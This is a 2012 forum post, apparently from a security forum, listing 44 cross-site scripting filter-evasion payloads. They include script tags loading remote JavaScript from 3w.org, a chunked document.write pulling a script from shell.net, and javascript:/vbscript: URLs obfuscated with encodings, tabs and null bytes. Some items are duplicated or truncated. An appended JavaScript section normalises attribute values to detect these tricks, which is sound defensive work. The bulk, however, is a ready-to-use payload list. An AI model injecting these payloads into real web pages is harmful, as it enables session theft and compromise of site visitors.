Title: XSS cross-site scripting attack roundup
Author: admin    Time: 2012-9-5 14:56

There seems to be rather little material on XSS here on t00ls, so when I saw something good I copied it over; not sure whether anyone needs to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line injected JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front of the JavaScript
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the Title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
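Most of the list above (items 3 through 19 and the SRC/HREF/BACKGROUND variants from item 31 onward) works by sneaking a script-executing URL scheme past a filter that matches the literal string "javascript:". The editorial example below, which is not part of the original post, shows the defender-side check that makes those variants equivalent: decode character references (decimal and hex, with or without the trailing semicolon), strip the control characters a browser ignores inside a URL (tab, LF, CR, NUL), trim, lower-case, and only then look at the scheme. It goes slightly beyond the page by also treating vbscript: and data: as dangerous and by offering an allow-list (http, https, relative) rather than a deny-list. All function names and the sample inputs are constructed for this example.

```javascript
// Added example (not from the original post): normalise an HTML URL attribute
// value the way a browser does before deciding which scheme it has, so that
// the obfuscations in the list above all collapse to the same answer.
// Function names and SAMPLES are constructed for this example.

// Schemes that execute script when used in SRC/HREF/BACKGROUND/etc.
// (javascript and vbscript appear on the page; data: is added as a defensive extra).
const DANGEROUS_SCHEMES = new Set(['javascript', 'vbscript', 'data']);

// Decode named, decimal and hexadecimal character references. The trailing
// semicolon is optional because browsers accept its absence (items 9 and 10).
// Accepting unterminated named references is more permissive than browsers,
// which is the conservative choice for a detector.
function decodeEntities(value) {
  const named = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'", tab: '\t', newline: '\n' };
  return value.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const key = body.toLowerCase();
    return key in named ? named[key] : match;
  });
}

// Order matters: decode entities first (so &#x09; becomes a real tab, item 12),
// then remove ASCII control characters (tab, LF, CR, NUL, ... items 11-17),
// then trim leading/trailing whitespace (item 19) and lower-case (item 4).
function normalizeUrlAttribute(value) {
  const decoded = decodeEntities(String(value));
  return decoded.replace(/[\u0000-\u001f\u007f]/g, '').trim().toLowerCase();
}

// Return the scheme of a normalised URL, or null if it is relative / has none.
function extractScheme(normalized) {
  const m = /^([a-z][a-z0-9+.-]*):/.exec(normalized);
  return m ? m[1] : null;
}

// Deny-list check: does this attribute value resolve to a script scheme?
function isScriptUrl(value) {
  const scheme = extractScheme(normalizeUrlAttribute(value));
  return scheme !== null && DANGEROUS_SCHEMES.has(scheme);
}

// Allow-list check, the form a sanitizer should actually use: only http(s)
// or scheme-less (relative) URLs survive; everything else is rejected.
function isAllowedUrl(value) {
  const scheme = extractScheme(normalizeUrlAttribute(value));
  return scheme === null || scheme === 'http' || scheme === 'https';
}

// Constructed sample attribute values mirroring the obfuscations listed above.
const SAMPLES = [
  "javascript:alert('XSS')",                                  // item 3
  "JaVaScRiPt:alert('XSS')",                                  // item 4
  " javascript:alert('XSS');",                                // item 19
  "jav\tascript:alert('XSS');",                               // item 11
  "jav&#x09;ascript:alert('XSS');",                           // item 12
  "jav\nascript:alert('XSS');",                               // item 13
  "java\0script:alert('XSS')",                                // item 17
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", // item 5
  "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert('XSS')",            // item 9
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",       // item 10
  'vbscript:msgbox("XSS")',                                   // item 40
  'https://example.org/image.png',                            // benign
  '/images/logo.png',                                         // benign, relative
];

// Stand-alone run: print the verdict for each sample.
for (const s of SAMPLES) {
  console.log(isScriptUrl(s) ? 'SCRIPT ' : 'ok     ', JSON.stringify(s));
}
```

The allow-list form (isAllowedUrl) is the one to wire into a sanitizer or template filter; isScriptUrl is useful as a detection rule over stored content or request logs, where a high hit rate on the deny-list patterns above is a stronger signal than any single one.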